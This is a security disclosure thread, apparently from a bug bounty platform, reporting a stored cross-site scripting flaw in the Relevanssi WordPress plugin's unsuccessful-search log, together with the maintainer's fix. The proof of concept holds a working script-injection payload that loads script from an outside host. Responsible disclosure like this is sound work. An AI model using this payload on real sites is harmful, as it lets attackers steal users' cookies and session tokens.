Cross-site Scripting (XSS) - Stored in msaari/relevanssi

Valid

Reported on

Oct 19th 2021


Description

Good afternoon. Beginning on 12 October 2021, our XSS catcher started receiving callbacks from a group of sites that are using the Relevanssi plugin for Wordpress. It appears to us that the software is not properly filtering Unsuccessful searches before displaying the information to the user. One of the sites that we received a blind stored XSS callback from is an offshore private bank. 👀

Proof of Concept

Our payload was sent via the website's search form and was formatted like so: foo"><script src=//xss></script><x=", which was displayed to the user's of your plug-in like so:

<td>foo"&gt;<script src="//xss"></script><x=" <a="" href="https://website/?s=foo%22%3E%3Cscript%20src%3D%2F%2Fxss%3E%3C%2Fscript%3E%3Cx%3D%22"><span class="dashicons dashicons-external"></span></x="></td>
                        <td style="padding: 3px 5px; text-align: center">2</td>

Impact

This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website. In fact, here is a list of 21 other things that hackers can do with an XSS flaw: https://s0md3v.github.io/21-things-xss/

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
geeknik
a year ago

Researcher


@admin, am curious if you can use https://wordpress.org/plugins/relevanssi/ when factoring the bounty? It shows 100,000+ active installs, despite the lack of stars on Github. Thank you!

We have contacted a member of the msaari/relevanssi team and are waiting to hear back a year ago
msaari
a year ago

Maintainer


Thanks, I'll fix this. The WordPress.org plugin repo is the main distribution channel for the plugin, so yes, the update will appear there.

msaari
a year ago

Maintainer


Line 339 in /lib/user-searches.php becomes

$query_link = wp_kses( $query->query, 'strip' );

The fix is now released as version 4.14.3. Relevanssi Premium isn't affected by this. Thanks!

msaari validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
msaari marked this as fixed with commit 4a8168 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
geeknik
a year ago

Researcher


@msaari LGTM, thank you for the fast response!

to join this conversation